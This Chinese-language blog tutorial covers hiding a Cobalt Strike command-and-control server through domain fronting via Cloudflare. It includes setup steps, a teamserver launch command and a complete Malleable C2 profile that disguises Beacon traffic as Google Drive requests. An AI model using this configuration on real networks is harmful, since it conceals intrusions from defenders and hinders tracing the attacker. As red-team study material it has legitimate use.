C2隐藏之域名前置(未完待续)

前言

在进行红队测试中,如果没对自己的C2服务器做一定的保护,在做命令控制时,在受害机器产生与C2服务器通信的网络连接,那么就很容易被溯源到真实ip,同时C2服务器也暴露了,也就很难进行下一步动作。

域前置

域前置(英语:Domain fronting),又译为域名幌子,是一种隐藏连接真实端点来规避互联网审查的技术。在应用层上运作时,域前置使用户能通过HTTPS连接到被屏蔽的服务,而表面上像在与另一个完全不同的站点通信。

域前置”技术是一种审查规避技术,主要用于隐蔽通信中的远程端点。“域前置”发生在应用层,主要适用了HTTPS协议进行通信,通信中的远程端点原本是被禁止的,通过使用“域前置”技术,让检测器误认为是一个其他的合法地址,进而绕过检测。核心思想是在不同的通信层使用了不一样的域名。在一个HTTPS请求中,通信外层使用了一个域名:DNS请求和TLS SNI (Server Name Indication);而在通信内层,则使用了另一个域名:HTTP Host Header,这个域名由于在HTTPS加密之下,所以对检测器而言是不可见的。

这里借用大佬的一张图
Z27VOB

域前置技术可以高信誉度的域名进行前置,例如Google、Microsoft等,这里我只是简单实践一下

准备

  1. C2域名
  2. Cloudflare账号一枚
  3. C2服务器

域名相关配置

  1. Godaddy购置一枚域名,并将NS服务器设置为Cloudflare的地址进行解析
    r8qJ1N

  2. Cloudflare设置对应的A记录
    Lb6rfC

  3. Cloudflare调整缓存配置
    关闭开发模式和缓存
    cBBrtH

  4. 配置C2.profile
    这里有大佬harmj0y整理的集合

    https://github.com/rsmudge/Malleable-C2-Profiles
    这里有个google profile参考

    #
    # Google Drive
    #
    # Author: @bluscreenofjeff
    #

    #set https cert info
    https-certificate {
    set CN "*.google.com"; #Common Name
    set O "Google Inc"; #Organization Name
    set C "US"; #Country
    set L "Mountain View"; #Locality
    set ST "California"; #State or Province
    set validity "365"; #Number of days the cert is valid for
    }

    #default Beacon sleep duration and jitter
    set sleeptime "60000";
    set jitter "20";

    #default useragent for HTTP comms
    set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";

    #IP address used to indicate no tasks are available to DNS Beacon
    set dns_idle "8.8.4.4";

    #Force a sleep prior to each individual DNS request. (in milliseconds)
    set dns_sleep "0";

    #Maximum length of hostname when uploading data over DNS (0-255)
    set maxdns "235";

    http-get {

    set uri "/viewerng/meta";

    client {

    header "Accept" "text/html,application/xml;*/*;";
    header "Accept-Encoding" "gzip, deflate";
    header "Host" "drive.google.com";
    header "Cookie" "SID=KsY0f3fxIeBLQRn2wHMhgJvTkFbWZIEqNyABgX_nveBtm9LeEmsHn6I9OmYzpw;";

    #session metadata
    metadata {
    base64url;
    netbios;
    base64url;
    parameter "id";
    }

    parameter "u" "0";
    }

    server {
    header "Content-Type" "application/json; charset=utf-8";
    header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
    header "Pragma" "no-cache";
    header "Content-Disposition" "attachment; filename=\"json.txt\"; filename*=UTF-8''json.txt";
    header "X-Content-Type-Options" "nosniff";
    header "X-Frame-Options" "SAMEORIGIN";
    header "X-XSS-Protection" "1; mode=block";
    header "Server" "GSE";
    header "Connection" "close";


    #Beacon's tasks
    output {
    print;
    }
    }
    }

    http-post {

    set uri "/viewersng/meta";
    set verb "GET";

    client {

    header "Accept" "text/html,application/xml;*/*;";
    header "Accept-Encoding" "gzip, deflate";
    header "Host" "drive.google.com";
    header "Cookie" "SID=KsY0f3fxIeBLQRn2wHMhgJvTkFbWZIEqNyABgX_nveBtm9LeEmsHn6I9OmYzpw;";


    output {
    base64url;
    netbios;
    base64url;
    parameter "id";
    }

    #session ID
    id {
    parameter "u";
    }
    }

    server {
    header "Content-Type" "application/json; charset=utf-8";
    header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
    header "Pragma" "no-cache";
    header "Content-Disposition" "attachment; filename=\"json.txt\"; filename*=UTF-8''json.txt";
    header "X-Content-Type-Options" "nosniff";
    header "X-Frame-Options" "SAMEORIGIN";
    header "X-XSS-Protection" "1; mode=block";
    header "Server" "GSE";
    header "Connection" "close";


    output {
    print;
    }
    }
    }

    #change the stager server
    http-stager {
    server {
    header "Content-Type" "application/json; charset=utf-8";
    header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
    header "Pragma" "no-cache";
    }
    }

    需要注意的将profile文件中所有的域名替换为C2域名
    Zms0j2

C2配置

  1. 将修改好的C2.profile上传到Cobalstrike的根目录,启动命令后加./C2.profile
    如:
    ./teamserver C2ip Password ./C2.profile
  2. Cobalstrike设置listener
    C9O3LG

最终效果

d4Ekxd

A90GBG

隐藏成功